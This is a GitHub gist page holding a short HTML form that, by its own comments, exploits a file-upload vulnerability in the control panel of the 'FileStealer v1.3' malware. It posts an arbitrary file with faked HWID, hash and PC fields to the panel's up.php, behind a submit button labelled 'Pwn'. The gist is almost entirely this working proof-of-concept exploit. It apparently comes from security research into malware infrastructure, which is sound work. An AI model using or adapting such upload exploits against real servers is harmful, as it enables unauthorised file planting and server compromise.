Skip to content

Instantly share code, notes, and snippets.

@Xyl2k
Created September 14, 2014 09:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save Xyl2k/ce1411cffc9d978a7aad to your computer and use it in GitHub Desktop.
Save Xyl2k/ce1411cffc9d978a7aad to your computer and use it in GitHub Desktop.
<!-- FileStealer v1.3 panel upload vulnerability -->
<!-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -->
<form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data">
File: <input type="file" name="file" /> <br />
HWID: <input type="text" name="hwid" value="COOFEEBABE" /> <br />
Hash: <input type="text" name="hash" value="2c471313f06370d0866db1facb34668e" /><br />
PC: <input type="text" name="pc" value="ANDROMAQUE" /> <br />
<input type="hidden" name="step" value="1337" />
<input type="submit" value="Pwn" />
</form>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment